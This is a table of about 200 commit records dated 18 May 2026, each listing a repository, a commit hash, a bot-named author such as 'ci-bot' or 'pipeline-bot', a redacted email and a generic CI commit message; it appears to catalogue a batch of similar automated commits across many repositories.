| 1578 | DexxoDev/Mohamed | 46b69fea10cb | build-bot | [email protected] | 2026-05-18T13:43:30.000Z | ci: add build optimization step |
| 1579 | Shirley940613/Shirley0613.Github.io | 46babc0f2516 | build-bot | [email protected] | 2026-05-18T13:57:49.000Z | chore: sync ci configuration |
| 1580 | Udbhav-2k25/udbhav-ht100-ml-002 | 46be2a301d5b | ci-bot | [email protected] | 2026-05-18T13:07:20.000Z | ci: update build config |
| 1581 | aledipa/Codifyer | 46c2ec399ac8 | pipeline-bot | [email protected] | 2026-05-18T12:38:21.000Z | ci: add build optimization step |
| 1582 | junaidirshad098/Gcu_attendance | 46c4803be933 | build-bot | [email protected] | 2026-05-18T13:14:40.000Z | ci: add build optimization step |
| 1583 | dpaetsch/Lighting-for-Impossible-Spaces | 46c5f99e19ff | build-bot | [email protected] | 2026-05-18T13:27:45.000Z | ci: update build config |
| 1584 | vikktor91/360-Companion | 46d474bf882a | ci-bot | [email protected] | 2026-05-18T13:51:12.000Z | fix: correct build workflow |
| 1585 | Ifzy99/printivoApp | 46d6b9342d8e | pipeline-bot | [email protected] | 2026-05-18T15:55:22.000Z | ci: add build optimization step |
| 1586 | Epikoding/voyage99_firstweek | 46d9acc4b3aa | auto-ci | [email protected] | 2026-05-18T12:23:46.000Z | chore: optimize pipeline runtime |
| 1587 | CHESSComputing/DataManagement | 46da1ad8c3f7 | auto-ci | [email protected] | 2026-05-18T13:40:03.000Z | ci: add build optimization step |
| 1588 | arj1211/Computer-Networking | 46dae8d7c10d | auto-ci | [email protected] | 2026-05-18T15:50:26.000Z | chore: update ci/cd pipeline |
| 1589 | akhill4054/collaborative_drawing_board | 46f4b94abd45 | pipeline-bot | [email protected] | 2026-05-18T16:33:53.000Z | ci: update build config |
| 1590 | trinhnguyenx/TS-basic | 46f63c8255f1 | pipeline-bot | [email protected] | 2026-05-18T15:47:04.000Z | chore: update ci/cd pipeline |
| 1591 | chicoluan/FixingBugs | 46fcdcb4c9e9 | pipeline-bot | [email protected] | 2026-05-18T12:35:45.000Z | fix: correct build workflow |
| 1592 | varunvaghasiya11/Day-12-challange | 471f2e131724 | auto-ci | [email protected] | 2026-05-18T13:53:51.000Z | build: improve ci performance |
| 1593 | ShaileshS237/contactuploader-backend | 47244fae0f53 | ci-bot | [email protected] | 2026-05-18T17:00:29.000Z | chore: update ci/cd pipeline |
| 1594 | mk016/mk016 | 4743c0e58d93 | build-bot | [email protected] | 2026-05-18T16:47:06.000Z | chore: optimize pipeline runtime |
| 1595 | bishaldahal4777/Bishal-portfolio | 47492b013142 | build-bot | [email protected] | 2026-05-18T13:28:13.000Z | ci: update build config |
| 1596 | harsh-ughreja-1/rn-installed-app | 474e31a6f61b | ci-bot | [email protected] | 2026-05-18T12:58:45.000Z | fix: correct build workflow |
| 1597 | binbsr/Kolpi | 474f4aba4405 | ci-bot | [email protected] | 2026-05-18T12:52:34.000Z | ci: update build config |
| 1598 | osamahkenawy/ubold-theme | 47799ce4f737 | build-bot | [email protected] | 2026-05-18T15:22:33.000Z | ci: update build config |
| 1599 | Asultop/AsulDesktopServices | 478462326560 | ci-bot | [email protected] | 2026-05-18T12:27:01.000Z | ci: add build optimization step |
| 1600 | bbie-6772/THESIMPLETOWERDEFENSE | 4785582e360b | pipeline-bot | [email protected] | 2026-05-18T11:59:28.000Z | chore: optimize pipeline runtime |
| 1601 | jenna-studio/test-action-1779116637468012458 | 4787bde3cecf | pipeline-bot | [email protected] | 2026-05-18T12:21:39.000Z | ci: add build optimization step |
| 1602 | WaveCloudx/BaileysV2 | 479765b9400e | build-bot | [email protected] | 2026-05-18T13:49:50.000Z | ci: add build optimization step |
| 1603 | NaimurDev/fullstack-blogging-laravel-nest-nextjs | 4799ddbfd766 | ci-bot | [email protected] | 2026-05-18T15:59:29.000Z | ci: update build config |
| 1604 | ShaileshS237/talent-hive | 479b77a4fb23 | auto-ci | [email protected] | 2026-05-18T16:53:34.000Z | chore: sync ci configuration |
| 1605 | ErezD1/test-action-1778957508071502891 | 47b482a3741d | pipeline-bot | [email protected] | 2026-05-18T12:26:34.000Z | fix: correct build workflow |
| 1606 | yashlad27/DC_LAB-FinalYear | 47b499b4ddaf | pipeline-bot | [email protected] | 2026-05-18T13:30:13.000Z | chore: sync ci configuration |
| 1607 | Pedrod8/Dispute | 47be59e2e959 | pipeline-bot | [email protected] | 2026-05-18T16:59:24.000Z | ci: update build config |
| 1608 | phase23/z90demo2 | 47cdcdf42d60 | build-bot | [email protected] | 2026-05-18T11:47:22.000Z | ci: add build optimization step |
| 1609 | sokha9788-sketch/Ecommerce_Etec | 47db42734ee4 | ci-bot | [email protected] | 2026-05-18T12:02:19.000Z | fix: correct build workflow |
| 1610 | alexmagwe/url_shortener | 481c2580381d | build-bot | [email protected] | 2026-05-18T13:00:16.000Z | fix: correct build workflow |
| 1611 | smallziz18/skills-introduction-to-github | 481efb3afd62 | auto-ci | [email protected] | 2026-05-18T12:07:03.000Z | chore: optimize pipeline runtime |
| 1612 | akhill4054/room | 482a9d638d49 | pipeline-bot | [email protected] | 2026-05-18T16:33:12.000Z | chore: update ci/cd pipeline |
| 1613 | humbledove2004-collab/MY-HOTEL-MANAGER | 4830ecbcc946 | auto-ci | [email protected] | 2026-05-18T12:14:32.000Z | chore: sync ci configuration |
| 1614 | rajanyadav80/test-action-1778959304210595877 | 48499b0c8023 | build-bot | [email protected] | 2026-05-18T13:06:34.000Z | chore: sync ci configuration |
| 1615 | KarlMak8/Assignment-5 | 484d310b956a | build-bot | [email protected] | 2026-05-18T16:36:31.000Z | chore: update ci/cd pipeline |
| 1616 | NITHIN-NT/test-action-1778964631240708871 | 487fee5d4adc | build-bot | [email protected] | 2026-05-18T13:19:26.000Z | chore: update ci/cd pipeline |
| 1617 | b1kaf7/DBMS | 48815431dd12 | auto-ci | [email protected] | 2026-05-18T15:28:44.000Z | chore: update ci/cd pipeline |
| 1618 | nebink/Bank-risk-analysis | 488af958fd25 | build-bot | [email protected] | 2026-05-18T12:15:34.000Z | build: improve ci performance |
| 1619 | rajanyadav80/test-action-1778963955834613442 | 488f536eabb0 | build-bot | [email protected] | 2026-05-18T13:06:13.000Z | fix: correct build workflow |
| 1620 | Hatem-Haj-Ismail/hello | 48923583d9b5 | auto-ci | [email protected] | 2026-05-18T12:11:39.000Z | build: improve ci performance |
| 1621 | Taher-10/Documents-agent-system | 48a9dd7f0592 | ci-bot | [email protected] | 2026-05-18T12:15:20.000Z | fix: correct build workflow |
| 1622 | manoharmedicharla24-create/webpractice2 | 48b820a99e64 | pipeline-bot | [email protected] | 2026-05-18T16:36:13.000Z | ci: update build config |
| 1623 | BharatDasa/DevOpsClassCodes | 48baa1b72dfc | build-bot | [email protected] | 2026-05-18T13:49:28.000Z | ci: update build config |
| 1624 | Rezasz/offplanlisting-website | 48cc290e73e2 | auto-ci | [email protected] | 2026-05-18T13:29:52.000Z | ci: update build config |
| 1625 | tutututurbo/Lezione-2---First-Web-App | 48e45cfbc0b9 | build-bot | [email protected] | 2026-05-18T16:13:01.000Z | ci: update build config |
| 1626 | Yousif-12/omnifood-front | 48f20ec73d73 | auto-ci | [email protected] | 2026-05-18T13:28:55.000Z | chore: sync ci configuration |
| 1627 | iamroshanpatak/Foodie-Delight | 48f4eb480801 | ci-bot | [email protected] | 2026-05-18T16:29:17.000Z | ci: update build config |
| 1628 | Asultop/chatgpt-on-wechat | 48f8598732d3 | auto-ci | [email protected] | 2026-05-18T12:42:53.000Z | ci: add build optimization step |
| 1629 | alexmagwe/products-page | 48f924cf5c71 | ci-bot | [email protected] | 2026-05-18T13:03:51.000Z | chore: optimize pipeline runtime |
| 1630 | BryanAlexanderSantoso/Flutter-Task-6-July | 48f99b72a816 | ci-bot | [email protected] | 2026-05-18T13:45:15.000Z | ci: add build optimization step |
| 1631 | mk016/GendaPhool-Main | 490288a599c8 | ci-bot | [email protected] | 2026-05-18T16:34:33.000Z | fix: correct build workflow |
| 1632 | EnamulBokshi/Java | 49158f9ee9d9 | build-bot | [email protected] | 2026-05-18T15:36:33.000Z | chore: update ci/cd pipeline |
| 1633 | ankitkumar572005/test-action-1778966162058586506 | 491cf6833596 | ci-bot | [email protected] | 2026-05-18T16:37:57.000Z | fix: correct build workflow |
| 1634 | Oflu-Tekno/L7 | 49343e703f25 | build-bot | [email protected] | 2026-05-18T12:05:50.000Z | build: improve ci performance |
| 1635 | WaveCloudx/catozolalaService | 49360b36c794 | auto-ci | [email protected] | 2026-05-18T13:47:53.000Z | ci: update build config |
| 1636 | fadexadex/agent-design-studio | 4938f4325bb7 | ci-bot | [email protected] | 2026-05-18T17:28:11.000Z | ci: update build config |
| 1637 | umairabhatti786/test-action-1778997996741032842 | 494074526f3e | build-bot | [email protected] | 2026-05-18T12:30:01.000Z | chore: update ci/cd pipeline |
| 1638 | luthfiiayyubi/Hackathon-site | 4949a7530055 | ci-bot | [email protected] | 2026-05-18T16:23:20.000Z | chore: sync ci configuration |
| 1639 | Bekir-Caglar/GeminiAi | 495c59423107 | build-bot | [email protected] | 2026-05-18T13:16:14.000Z | build: improve ci performance |
| 1640 | kirankhadka9/BackEnd | 49602b56b110 | build-bot | [email protected] | 2026-05-18T16:37:43.000Z | fix: correct build workflow |
| 1641 | praktikum-java/grpc-echo-demo | 4962e039fd71 | ci-bot | [email protected] | 2026-05-18T13:52:54.000Z | build: improve ci performance |
| 1642 | rahulbohra57/MOM-Generator | 49732164e8b6 | build-bot | [email protected] | 2026-05-18T16:33:41.000Z | build: improve ci performance |
| 1643 | AbhishekAnamala/portfolio | 497b926a90ea | ci-bot | [email protected] | 2026-05-18T16:11:08.000Z | chore: sync ci configuration |
| 1644 | andersonphiri/csharpAlg2022 | 4995d9efae9e | ci-bot | [email protected] | 2026-05-18T13:56:32.000Z | chore: update ci/cd pipeline |
| 1645 | AmarKumarShaw/reactjs_dashboard_darkmode | 49a087eb3a2a | pipeline-bot | [email protected] | 2026-05-18T12:18:14.000Z | chore: sync ci configuration |
| 1646 | JKS-sys/todo-list-app-with-vite---reactjs-at-0001 | 49a6ea440fbc | auto-ci | [email protected] | 2026-05-18T14:20:24.000Z | chore: optimize pipeline runtime |
| 1647 | thecodinglive/fastcampus-example | 49b48cc7bfe8 | auto-ci | [email protected] | 2026-05-18T12:29:48.000Z | fix: correct build workflow |
| 1648 | brahamandAI/clientproject | 49d62c35bbcc | pipeline-bot | [email protected] | 2026-05-18T11:52:32.000Z | ci: add build optimization step |
| 1649 | OlatundeGbolahanElijah/dreamland-student-application-system | 49ddc319ea90 | auto-ci | [email protected] | 2026-05-18T13:23:37.000Z | ci: update build config |
| 1650 | Asultop/profile | 49e31994521e | auto-ci | [email protected] | 2026-05-18T12:41:47.000Z | chore: optimize pipeline runtime |
| 1651 | vahitkeskin/vahitkeskin.github.io | 49e51f772e41 | build-bot | [email protected] | 2026-05-18T13:21:50.000Z | chore: update ci/cd pipeline |
| 1652 | just-abdullah-dev/David-Chu-s-Restaurant | 49e616dc6ef8 | ci-bot | [email protected] | 2026-05-18T13:59:53.000Z | build: improve ci performance |
| 1653 | Ediekkhan/infinity-react | 49efa6dcb606 | ci-bot | [email protected] | 2026-05-18T13:47:39.000Z | ci: update build config |
| 1654 | nebink/Diabetes-Prediction-using-linear-Classification | 4a0129ea3f61 | build-bot | [email protected] | 2026-05-18T12:15:12.000Z | chore: sync ci configuration |
| 1655 | prasiddhp10/HospitalManagementSystem | 4a2b477378be | ci-bot | [email protected] | 2026-05-18T12:39:46.000Z | chore: sync ci configuration |
| 1656 | AmarKumarShaw/assignment4_react_redux | 4a2c59bb40db | auto-ci | [email protected] | 2026-05-18T12:17:41.000Z | chore: sync ci configuration |
| 1657 | MouadKH9/portfolio-next | 4a365910fbc7 | pipeline-bot | [email protected] | 2026-05-18T12:54:57.000Z | chore: update ci/cd pipeline |
| 1658 | adeelcheeema/CoverGAN | 4a3ec3377314 | pipeline-bot | [email protected] | 2026-05-18T13:10:36.000Z | ci: add build optimization step |
| 1659 | LevwTech/CE-HUB | 4a4697ebc266 | build-bot | [email protected] | 2026-05-18T13:00:24.000Z | ci: update build config |
| 1660 | B-andir/Windows-Forms-and-MongoDb-Project | 4a51b382adb8 | ci-bot | [email protected] | 2026-05-18T17:06:29.000Z | ci: update build config |
| 1661 | smit-sk/Recipe-app | 4a6bf1855549 | auto-ci | [email protected] | 2026-05-18T16:16:27.000Z | chore: update ci/cd pipeline |
| 1662 | cybxrrgsouraabh/test-action-1778960008493268122 | 4a7e1290f111 | build-bot | [email protected] | 2026-05-18T12:13:04.000Z | ci: add build optimization step |
| 1663 | andersonphiri/akka-streams-practice | 4a8495f671c1 | auto-ci | [email protected] | 2026-05-18T13:53:46.000Z | chore: update ci/cd pipeline |
| 1664 | LEAP-MNG-1f/Lhagvaa | 4a9c2eabbd13 | auto-ci | [email protected] | 2026-05-18T16:01:52.000Z | chore: optimize pipeline runtime |
| 1665 | 25005-Tech-Infinite/25005-TechInfinity-IntoTheDeep | 4ab1ee82fb5a | build-bot | [email protected] | 2026-05-18T17:29:09.000Z | ci: add build optimization step |
| 1666 | 0xdps/gitvisor | 4ab6b90b07a6 | ci-bot | [email protected] | 2026-05-18T13:55:23.000Z | ci: add build optimization step |
| 1667 | todrfu/cute-nestjs | 4ab72b570ed7 | auto-ci | [email protected] | 2026-05-18T14:09:44.000Z | chore: sync ci configuration |
| 1668 | pranto2051/Parking-management-system-01 | 4acb038ca581 | pipeline-bot | [email protected] | 2026-05-18T13:55:39.000Z | fix: correct build workflow |
| 1669 | Shirley940613/binbin1140613.Github.io | 4ad6fb31b491 | ci-bot | [email protected] | 2026-05-18T13:57:08.000Z | chore: sync ci configuration |
| 1670 | Wookie3/CSFS1020-API-Design-Exercise | 4adc620f4ebf | pipeline-bot | [email protected] | 2026-05-18T16:36:36.000Z | build: improve ci performance |
| 1671 | pranto2051/gurukul_education | 4ae5ef15c358 | build-bot | [email protected] | 2026-05-18T14:06:10.000Z | build: improve ci performance |
| 1672 | andersonphiri/javasearchngin | 4ae922120aa3 | ci-bot | [email protected] | 2026-05-18T13:58:54.000Z | chore: optimize pipeline runtime |
| 1673 | gliepins/cr1 | 4af8d6ac89ab | auto-ci | [email protected] | 2026-05-18T16:48:00.000Z | chore: optimize pipeline runtime |
| 1674 | guimmamanna/Fullstack-Testing | 4afac3911901 | auto-ci | [email protected] | 2026-05-18T13:05:20.000Z | build: improve ci performance |
| 1675 | MaximKabaev/age_guess | 4b044fc416b6 | pipeline-bot | [email protected] | 2026-05-18T14:32:52.000Z | chore: sync ci configuration |
| 1676 | umairabhatti786/BnodyPOS | 4b0643a4d461 | ci-bot | [email protected] | 2026-05-18T13:08:30.000Z | ci: add build optimization step |
| 1677 | danhoernchen/bootdev_asteroids | 4b0a4728c4b6 | build-bot | [email protected] | 2026-05-18T13:55:51.000Z | chore: sync ci configuration |
| 1678 | nehal-0407/AI_Lab | 4b13e5869d8b | pipeline-bot | [email protected] | 2026-05-18T16:08:42.000Z | chore: optimize pipeline runtime |
| 1679 | andersonphiri/golang | 4b1f3c11e495 | auto-ci | [email protected] | 2026-05-18T13:57:28.000Z | chore: sync ci configuration |
| 1680 | dustingolding/OpsPad | 4b2ae85534af | pipeline-bot | [email protected] | 2026-05-18T17:30:28.000Z | ci: add build optimization step |
| 1681 | muhammamdsurya/FE-Resis | 4b5db9b30409 | pipeline-bot | [email protected] | 2026-05-18T14:05:04.000Z | ci: add build optimization step |
| 1682 | Srj-Love/SpringJPA | 4b5f2ef7518b | ci-bot | [email protected] | 2026-05-18T12:51:20.000Z | chore: optimize pipeline runtime |
| 1683 | pranto2051/Figma-to-Next-JS-Project | 4b61fc47759c | auto-ci | [email protected] | 2026-05-18T14:07:58.000Z | chore: sync ci configuration |
| 1684 | kingjamesegun/Rapid-NEWS | 4b6fb157739a | ci-bot | [email protected] | 2026-05-18T12:33:18.000Z | build: improve ci performance |
| 1685 | johncanales1/vintraxx-saas-frontend | 4b8499f4e33f | build-bot | [email protected] | 2026-05-18T14:30:26.000Z | chore: optimize pipeline runtime |
| 1686 | JKS-sys/Get-user-s-data-from-JSONPlaceholder-API | 4b8b9184cb84 | build-bot | [email protected] | 2026-05-18T14:23:17.000Z | ci: update build config |
| 1687 | ParityBit-Security/Crawler | 4b9735cc78c0 | auto-ci | [email protected] | 2026-05-18T15:22:15.000Z | build: improve ci performance |
| 1688 | assiljaby/online-mini-drumkit | 4b9f37b1ffbb | auto-ci | [email protected] | 2026-05-18T13:05:09.000Z | ci: update build config |
| 1689 | arj1211/CCC | 4babea7df684 | auto-ci | [email protected] | 2026-05-18T15:53:56.000Z | chore: optimize pipeline runtime |
| 1690 | Marshall-Hu/JUnit-Practice | 4bb1dc5fffdb | pipeline-bot | [email protected] | 2026-05-18T13:55:57.000Z | fix: correct build workflow |
| 1691 | todrfu/utools-ai-translate | 4bb96b2b8ed2 | build-bot | [email protected] | 2026-05-18T14:11:49.000Z | ci: add build optimization step |
| 1692 | HitG010/DeepTrace | 4bbbb6310bfc | build-bot | [email protected] | 2026-05-18T12:08:04.000Z | build: improve ci performance |
| 1693 | smit-sk/Visitora-a-mobile-application-for-visitor-managment- | 4bbcfbcc9c61 | pipeline-bot | [email protected] | 2026-05-18T16:18:04.000Z | chore: optimize pipeline runtime |
| 1694 | noushiFlex/todo-app | 4bcfff04f40f | pipeline-bot | [email protected] | 2026-05-18T17:46:34.000Z | ci: add build optimization step |
| 1695 | varunvaghasiya11/Day-9-challange | 4bd1c5cbf5c7 | pipeline-bot | [email protected] | 2026-05-18T13:54:09.000Z | chore: optimize pipeline runtime |
| 1696 | ANDREWTENAJEROS/SEOA1 | 4bd9863f3328 | pipeline-bot | [email protected] | 2026-05-18T16:13:50.000Z | chore: optimize pipeline runtime |
| 1697 | kozlowski98/test-action-1778966162035525880 | 4bdb6341f9a1 | auto-ci | [email protected] | 2026-05-18T13:39:12.000Z | chore: update ci/cd pipeline |
| 1698 | bbarreto96/test-action-1778963955789046521 | 4beb482b0dc6 | build-bot | [email protected] | 2026-05-18T16:43:24.000Z | ci: add build optimization step |
| 1699 | Udbhav-2025/udbhav-ht100-ga-007 | 4bed768b712c | ci-bot | [email protected] | 2026-05-18T13:08:41.000Z | ci: add build optimization step |
| 1700 | ConnectSiteForge/docs-6u6g3e | 4beea9c7da4e | auto-ci | [email protected] | 2026-05-18T14:36:00.000Z | chore: optimize pipeline runtime |
| 1701 | ANDREWTENAJEROS/Wakalend | 4c0560d46b04 | auto-ci | [email protected] | 2026-05-18T16:08:52.000Z | chore: update ci/cd pipeline |
| 1702 | aurore017/Lab2-Plagiarism_Detector-aurore017 | 4c269ab1adf0 | auto-ci | [email protected] | 2026-05-18T13:28:46.000Z | fix: correct build workflow |
| 1703 | Jacfran123/jacfran-web | 4c4a0e1d509f | ci-bot | [email protected] | 2026-05-18T17:38:12.000Z | ci: update build config |
| 1704 | theabelchannel/Taller12 | 4c4ada287bd2 | auto-ci | [email protected] | 2026-05-18T13:22:05.000Z | chore: optimize pipeline runtime |
| 1705 | arpita009/form-app | 4c722083fc44 | ci-bot | [email protected] | 2026-05-18T16:34:10.000Z | fix: correct build workflow |
| 1706 | 0xlabs-space/0xlabs-space | 4c724e8e860f | build-bot | [email protected] | 2026-05-18T13:58:56.000Z | build: improve ci performance |
| 1707 | REPOSITORIO-PROYECTOS/hambugexitos | 4c8b684f7e33 | auto-ci | [email protected] | 2026-05-18T14:13:05.000Z | build: improve ci performance |
| 1708 | vichuer/team_interval_assignment | 4c97748bab2d | auto-ci | [email protected] | 2026-05-18T12:52:30.000Z | chore: optimize pipeline runtime |
| 1709 | aliimranjazib/aliimranjazib | 4c9805e2d5d6 | build-bot | [email protected] | 2026-05-18T16:10:50.000Z | chore: sync ci configuration |
| 1710 | ParityBit-Security/Securegenie | 4c9d0d43bf58 | auto-ci | [email protected] | 2026-05-18T15:22:57.000Z | fix: correct build workflow |
| 1711 | lyysm/alerta-web | 4ca03ecf8b85 | ci-bot | [email protected] | 2026-05-18T14:24:07.000Z | chore: update ci/cd pipeline |
| 1712 | maheshchonde89-ctrl/my-portfolio | 4cb752915330 | auto-ci | [email protected] | 2026-05-18T12:49:25.000Z | chore: optimize pipeline runtime |
| 1713 | asdallah20255/passanger_app | 4cbbca80f2cc | pipeline-bot | [email protected] | 2026-05-18T13:57:02.000Z | fix: correct build workflow |
| 1714 | SahilVGite/WorldMapping | 4cbd1850a96a | build-bot | [email protected] | 2026-05-18T12:22:26.000Z | fix: correct build workflow |
| 1715 | andersonphiri/json-parser | 4cc2f51d0b2b | pipeline-bot | [email protected] | 2026-05-18T13:57:41.000Z | ci: add build optimization step |
| 1716 | Exp-Primer-Copilot-Cohort-1/experience-primer-copilot-adhithyasimha | 4cd781085bbd | ci-bot | [email protected] | 2026-05-18T12:45:02.000Z | chore: sync ci configuration |
| 1717 | smit-sk/p4-mkt-keyvault | 4ce349d3c493 | build-bot | [email protected] | 2026-05-18T16:11:59.000Z | build: improve ci performance |
| 1718 | EnamulBokshi/BR-Architech | 4ceae2ef375e | build-bot | [email protected] | 2026-05-18T15:37:05.000Z | chore: sync ci configuration |
| 1719 | AmanWorku/Dominos-Pizza-RN | 4cee32659947 | pipeline-bot | [email protected] | 2026-05-18T12:27:57.000Z | chore: sync ci configuration |
| 1720 | l8yh1/mocroff11 | 4cfae9f8e952 | ci-bot | [email protected] | 2026-05-18T17:34:40.000Z | chore: sync ci configuration |
| 1721 | AbhishekAnamala/TicTacToe | 4d02ed887949 | auto-ci | [email protected] | 2026-05-18T16:12:02.000Z | chore: update ci/cd pipeline |
| 1722 | roydellclarke/api | 4d04c6a85ba9 | pipeline-bot | [email protected] | 2026-05-18T13:04:04.000Z | build: improve ci performance |
| 1723 | danhoernchen/odin-linked-list | 4d04d0610f64 | pipeline-bot | [email protected] | 2026-05-18T13:54:07.000Z | chore: update ci/cd pipeline |
| 1724 | Ashwiin/SpaceXFalcon9Landing_WebScraping | 4d1904612bae | pipeline-bot | [email protected] | 2026-05-18T16:53:18.000Z | ci: update build config |
| 1725 | SuyeongUeno/financial_ledger_program | 4d23be861f02 | pipeline-bot | [email protected] | 2026-05-18T17:09:35.000Z | chore: sync ci configuration |
| 1726 | naveenld024/tim_ui_kit_sticker_plugin-3.2.0 | 4d30d5e2082a | auto-ci | [email protected] | 2026-05-18T13:25:40.000Z | fix: correct build workflow |
| 1727 | shivanshu-pietechsolutions/test-action-1779116637337119519 | 4d4611c340f2 | build-bot | [email protected] | 2026-05-18T12:46:18.000Z | build: improve ci performance |
| 1728 | MR-AYAN-CHOWDHURY/ADNAN-BOT | 4d4aa0c39c79 | ci-bot | [email protected] | 2026-05-18T11:43:28.000Z | fix: correct build workflow |
| 1729 | Bekig7/TrekDB | 4d4e420bf10e | auto-ci | [email protected] | 2026-05-18T13:53:12.000Z | chore: update ci/cd pipeline |
| 1730 | pranto2051/Page_Change_Design | 4d62235117dd | ci-bot | [email protected] | 2026-05-18T13:56:43.000Z | ci: update build config |
| 1731 | HarshAgnihotri9/backend-dsa | 4d85092ca284 | pipeline-bot | [email protected] | 2026-05-18T12:16:45.000Z | chore: update ci/cd pipeline |
| 1732 | chicoluan/todo-app | 4d9385928d24 | build-bot | [email protected] | 2026-05-18T12:24:36.000Z | ci: update build config |
| 1733 | harshNaik99/hireverse | 4d94145ed9c8 | auto-ci | [email protected] | 2026-05-18T16:04:58.000Z | fix: correct build workflow |
| 1734 | elenecu/teslo-shop | 4d974495a1d8 | ci-bot | [email protected] | 2026-05-18T16:08:16.000Z | chore: optimize pipeline runtime |
| 1735 | Mohan2200031661/project1 | 4d990bdd44a9 | ci-bot | [email protected] | 2026-05-18T13:14:07.000Z | chore: update ci/cd pipeline |
| 1736 | devesh48/REACT-TOOL | 4da03595d883 | auto-ci | [email protected] | 2026-05-18T16:33:00.000Z | build: improve ci performance |
| 1737 | luiggipr/midtermProjectPOO | 4dd2b1d5049c | pipeline-bot | [email protected] | 2026-05-18T13:24:32.000Z | chore: optimize pipeline runtime |
| 1738 | smallziz18/student-performance-predictor | 4dd3ffdb5b12 | build-bot | [email protected] | 2026-05-18T12:10:07.000Z | build: improve ci performance |
| 1739 | tanishqgoyal000/kurtis | 4dd562823d34 | auto-ci | [email protected] | 2026-05-18T13:01:43.000Z | ci: add build optimization step |
| 1740 | codedecode25/global-exception-handling | 4dec2c52ec09 | pipeline-bot | [email protected] | 2026-05-18T17:06:30.000Z | chore: update ci/cd pipeline |
| 1741 | Asultop/AsulCFGManager-Next | 4df5e97bba2a | build-bot | [email protected] | 2026-05-18T12:23:56.000Z | ci: add build optimization step |
| 1742 | wbtw-repositories/.github | 4df899361dc5 | build-bot | [email protected] | 2026-05-18T11:42:10.000Z | ci: add build optimization step |
| 1743 | RuchirKadam1729/dc-lab-proj | 4dfb5fb0eeb6 | auto-ci | [email protected] | 2026-05-18T12:57:51.000Z | ci: add build optimization step |
| 1744 | brahamandAI/Orbitx2 | 4e030ea2b799 | auto-ci | [email protected] | 2026-05-18T11:51:48.000Z | ci: update build config |
| 1745 | AmarKumarShaw/gym_website_fitness | 4e0477c6085d | build-bot | [email protected] | 2026-05-18T12:15:07.000Z | build: improve ci performance |
| 1746 | LuanKrzyzaniak/Arena | 4e2ca63b1412 | build-bot | [email protected] | 2026-05-18T17:11:35.000Z | chore: optimize pipeline runtime |
| 1747 | trixobird/tests-core | 4e3ca34ca6ca | auto-ci | [email protected] | 2026-05-18T14:44:35.000Z | fix: correct build workflow |
| 1748 | naveenJose24/Creative-Bricks-wallpapers | 4e54961739c6 | build-bot | [email protected] | 2026-05-18T13:52:18.000Z | build: improve ci performance |
| 1749 | gokul-227/Portfolio | 4e55983bfba3 | auto-ci | [email protected] | 2026-05-18T16:18:21.000Z | chore: optimize pipeline runtime |
| 1750 | akashcruz/skill-network- | 4e67cd3b9522 | ci-bot | [email protected] | 2026-05-18T13:03:35.000Z | chore: optimize pipeline runtime |
| 1751 | LuciferVid/SocAI | 4e741d6bb737 | ci-bot | [email protected] | 2026-05-18T12:09:56.000Z | chore: update ci/cd pipeline |
| 1752 | riomukhtarom/FootballApps | 4e7bbb871395 | ci-bot | [email protected] | 2026-05-18T15:45:24.000Z | build: improve ci performance |
| 1753 | BryanAlexanderSantoso/PilarBermanWebster2 | 4e7ec2374401 | pipeline-bot | [email protected] | 2026-05-18T13:52:15.000Z | ci: add build optimization step |
| 1754 | git-init-priyanshu/Learning-PostgreSQL | 4e8800d69500 | pipeline-bot | [email protected] | 2026-05-18T17:37:47.000Z | ci: update build config |
| 1755 | praktikum-java/kafkamobile | 4e889d11e9a3 | build-bot | [email protected] | 2026-05-18T13:52:43.000Z | chore: update ci/cd pipeline |
| 1756 | MaximKabaev/reddit-to-youtube | 4ead93667df2 | ci-bot | [email protected] | 2026-05-18T14:32:01.000Z | ci: update build config |
| 1757 | assiljaby/trafic-toll-calculator | 4eaf57137f18 | pipeline-bot | [email protected] | 2026-05-18T13:03:55.000Z | chore: sync ci configuration |
| 1758 | Michkath12/Apple | 4eb6c50f2801 | ci-bot | [email protected] | 2026-05-18T17:08:26.000Z | chore: optimize pipeline runtime |
| 1759 | ibrahiemhss/react-native-hexagon | 4eb8a1e54ab9 | pipeline-bot | [email protected] | 2026-05-18T14:01:20.000Z | fix: correct build workflow |
| 1760 | saradune6/Agentic-Feature-Mart | 4ec69cae13cf | ci-bot | [email protected] | 2026-05-18T12:59:25.000Z | fix: correct build workflow |
| 1761 | Wookie3/day-in-history | 4ed703263995 | ci-bot | [email protected] | 2026-05-18T16:29:33.000Z | ci: add build optimization step |
| 1762 | kaanakboga/RareCarTracker | 4f04aef97eef | auto-ci | [email protected] | 2026-05-18T13:34:13.000Z | fix: correct build workflow |
| 1763 | MaximKabaev/MyWebsite | 4f097e6f9aa0 | ci-bot | [email protected] | 2026-05-18T14:33:09.000Z | chore: update ci/cd pipeline |
| 1764 | Mostakim0978/D1PT0 | 4f0e3746b6e2 | auto-ci | [email protected] | 2026-05-18T11:43:15.000Z | chore: update ci/cd pipeline |
| 1765 | akashcruz/voice_clonning_app | 4f1be12e01f1 | ci-bot | [email protected] | 2026-05-18T13:08:03.000Z | build: improve ci performance |
| 1766 | RameshRukshan/React_js_EssT | 4f1ddcdaa5f6 | auto-ci | [email protected] | 2026-05-18T17:27:27.000Z | chore: update ci/cd pipeline |
| 1767 | pranto2051/PY | 4f215d1d73ed | ci-bot | [email protected] | 2026-05-18T14:15:45.000Z | ci: update build config |
| 1768 | nnfuad/learning-bash | 4f24c706a8b2 | ci-bot | [email protected] | 2026-05-18T13:31:07.000Z | chore: sync ci configuration |
| 1769 | LuanKrzyzaniak/machine-learning-study | 4f28dd81b6cf | build-bot | [email protected] | 2026-05-18T17:15:35.000Z | fix: correct build workflow |
| 1770 | codedecode25/food-catalogue-service | 4f3137223b58 | ci-bot | [email protected] | 2026-05-18T17:18:53.000Z | build: improve ci performance |
| 1771 | cybxrrgsouraabh/CourseSellingAppBack-end | 4f36646a60ee | build-bot | [email protected] | 2026-05-18T12:16:55.000Z | ci: update build config |
| 1772 | Ediekkhan/CartoTest | 4f36c6b781ec | pipeline-bot | [email protected] | 2026-05-18T13:43:25.000Z | chore: sync ci configuration |
| 1773 | alanmunoz25/archive-tb9t3n | 4f3c21bb9849 | ci-bot | [email protected] | 2026-05-18T14:22:36.000Z | build: improve ci performance |
| 1774 | codedecode25/restaurant-service | 4f4be87bb42d | auto-ci | [email protected] | 2026-05-18T17:15:42.000Z | chore: sync ci configuration |
| 1775 | riomukhtarom/IAKIntermedietPopularMovie | 4f4fcda70bc9 | ci-bot | [email protected] | 2026-05-18T15:48:57.000Z | ci: add build optimization step |
